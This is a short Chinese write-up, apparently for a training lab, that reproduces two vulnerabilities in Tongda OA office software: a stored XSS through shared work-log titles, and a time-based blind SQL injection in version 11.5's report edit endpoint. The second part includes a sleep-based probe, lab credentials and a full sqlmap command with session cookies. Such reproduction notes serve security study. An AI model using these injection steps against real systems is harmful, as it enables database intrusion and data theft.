通达OA 漏洞复现

0x01 通达OA 2013 XSS漏洞

进入登录页面，先用普通用户登陆。

打开个人桌面上 -> 工作日志板块，新建日志，在标题处插入xss语句，并选择共享给管理员，最后保存。

共享给管理员：

由于未作过滤等防护措施，当管理员查看员工日志时，会触发弹窗。
退出当前账户（不要选注销），登陆管理员账号，出现员工日志提醒：

进入日志，触发弹窗。当然，通过桌面进入也能触发。

0x02 通达oa 11.5 sql注入漏洞

登陆通达oa系统，普通账户：sql 密码：qazwsx123

在webroot\general\appbuilder\modules\report\controllers\RepdetailController.php，actionEdit函数中存在 一个$_GET["id"]; 此处未经过滤，抓包拼接SQL语句

访问:http://oa.wb.aqlab.cn/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2

拼接or sleep(1)

拼接or sleep(2)

验证此处存在sql注入，且是sql盲注

可以上sqlmap跑出数据库名

Payload：

sqlmap.py -u "http://oa.wb.aqlab.cn/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2" -p id --cookie=" USER_NAME_COOKIE=sql; OA_USER_ID=65; SID_1=b2b5cf; PHPSESSID=f63hisotji1son3anop366c0g0; SID_65=cb39fb6; creat_work=new" --current-db